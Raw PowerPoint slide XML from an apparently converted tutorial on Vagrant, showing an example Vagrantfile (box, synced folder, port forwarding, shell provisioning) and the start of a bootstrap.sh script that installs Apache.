                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="35" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>|conig|</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10477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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”ubuntu/trusty64”</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.synced_folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”v-root”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”/vagrant” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775" marR="5080">
              <a:lnSpc>
                <a:spcPct val="121300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.provision </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:shell, path: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”bootstrap.sh” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:forwarded_port, guest: 80, host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>3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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>v-root </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>shared-folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(default: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./).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6546" y="3170532"/>
            <a:ext cx="97790" cy="1130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600" spc="-50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>18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122" y="190436"/>
            <a:ext cx="9036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>
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/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221355" y="1638680"/>
            <a:ext cx="284480" cy="389255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="185674" y="92837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="178378" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="185674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178378" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185674" y="92837"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="284226" y="296291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276930" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="203454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98552" y="296291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="389128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276930" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284226" y="296291"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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36019" y="2042956"/>
            <a:ext cx="193732" cy="193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304" y="2461908"/>
            <a:ext cx="190723" cy="190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8589" y="699201"/>
            <a:ext cx="3931920" cy="194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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrantfile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"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1866264">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrantile  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrant.conigure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”2”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="35" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>|conig|</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10477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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”ubuntu/trusty64”</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.synced_folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”v-root”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”/vagrant” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775" marR="5080">
              <a:lnSpc>
                <a:spcPct val="121300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.provision </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:shell, path: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”bootstrap.sh” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:forwarded_port, guest: 80, host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>3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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74930">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>execute </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bootstrap.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>guest-system. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>called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130" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Provisioning</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-13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6546" y="3170532"/>
            <a:ext cx="97790" cy="1130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600" spc="-50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>18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589" y="190436"/>
            <a:ext cx="4194175" cy="2769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sz="1200" spc="-204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1200" spc="-125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EXAMPLE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110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Provisioning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12700" marR="3070860">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ cat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-9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bootstrap.sh  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>apt-get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update</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2625090">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>apt-get install -y </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>apache2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>-L </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>/var/www </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>;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spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>rm </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>-rf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
